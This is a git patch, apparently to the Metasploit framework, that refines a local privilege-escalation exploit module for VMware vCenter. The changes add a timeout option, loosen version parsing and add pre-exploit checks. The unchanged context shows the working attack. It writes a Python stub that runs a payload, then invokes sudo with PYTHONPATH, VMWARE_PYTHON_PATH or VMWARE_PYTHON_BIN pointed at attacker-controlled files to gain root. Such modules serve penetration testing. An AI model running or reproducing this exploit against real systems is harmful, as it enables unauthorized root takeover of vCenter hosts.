From bca3626cf2585acb857b769f2070d76df9bf7c31 Mon Sep 17 00:00:00 2001
From: h00die <michaeltcyr@gmail.com>
Date: Wed, 4 Dec 2024 18:39:43 -0500
Subject: [PATCH] peer review

---
 .../exploits/linux/local/vcenter_sudo_lpe.rb  | 23 ++++++++++++-------
 1 file changed, 15 insertions(+), 8 deletions(-)

diff --git a/modules/exploits/linux/local/vcenter_sudo_lpe.rb b/modules/exploits/linux/local/vcenter_sudo_lpe.rb
index 329b1db14ac8..88dc67f2bd28 100644
--- a/modules/exploits/linux/local/vcenter_sudo_lpe.rb
+++ b/modules/exploits/linux/local/vcenter_sudo_lpe.rb
@@ -54,7 +54,8 @@ def initialize(info = {})
       )
     )
     register_advanced_options [
-      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+      OptInt.new('TIMEOUT', [ true, 'Command timeout', 30 ])
     ]
   end
 
@@ -68,7 +69,7 @@ def check
     # VMware vCenter Server Appliance 6.5.0.0 Build 16197320
     # we want to try to make this build number Rex::Version friendly. https://rubular.com/r/BNLDjy0C862cdS
     # technically we only care about major release 7 and 8, however we'll try to future proof w/ \d instead
-    return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d\.\d\.\d) build[- ](\d+)/i =~ vbuild
+    return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d+\.\d+\.\d+) build[- ](\d+)/i =~ vbuild
 
     vbuild_version = Rex::Version.new("#{Regexp.last_match(1)}.#{Regexp.last_match(2)}")
 
@@ -106,9 +107,8 @@ def exploit_operator_group
     write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
     register_files_for_cleanup(payload_stub)
 
-    timeout = 30
     print_status 'Launching exploit...'
-    output = cmd_exec "sudo PYTHONPATH=#{base_dir} #{vuln_exe}", nil, timeout
+    output = cmd_exec "sudo PYTHONPATH=#{base_dir} #{vuln_exe}", nil, datastore['TIMEOUT']
     output.each_line { |line| vprint_status line.chomp }
   end
 
@@ -128,9 +128,8 @@ def exploit_pod_user
     write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
     register_files_for_cleanup(payload_stub)
 
-    timeout = 30
     print_status 'Launching exploit...'
-    output = cmd_exec "sudo VMWARE_PYTHON_PATH=#{base_dir} install-parameter", nil, timeout
+    output = cmd_exec "sudo VMWARE_PYTHON_PATH=#{base_dir} install-parameter", nil, datastore['TIMEOUT']
     output.each_line { |line| vprint_status line.chomp }
   end
 
@@ -150,13 +149,19 @@ def exploit_admin_group
     write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
     register_files_for_cleanup(payload_stub)
 
-    timeout = 30
     print_status 'Launching exploit...'
-    output = cmd_exec "sudo VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli", nil, timeout
+    output = cmd_exec "sudo VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli", nil, datastore['TIMEOUT']
     output.each_line { |line| vprint_status line.chomp }
   end
 
   def exploit
+    if !datastore['ForceExploit'] && is_root?
+      fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override')
+    end
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
     @user = cmd_exec('whoami').chomp if @user.nil?
     @groups = cmd_exec('groups').chomp.split(' ') if @groups.nil?
     if @user == 'pod'
@@ -165,6 +170,8 @@ def exploit
       exploit_operator_group
     elsif @groups.include? 'admin'
       exploit_admin_group
+    else
+      fail_with(Failure::BadConfig, "User not vulnerable or not in correct group. (#{@user}:#{@groups})")
     end
   end
 end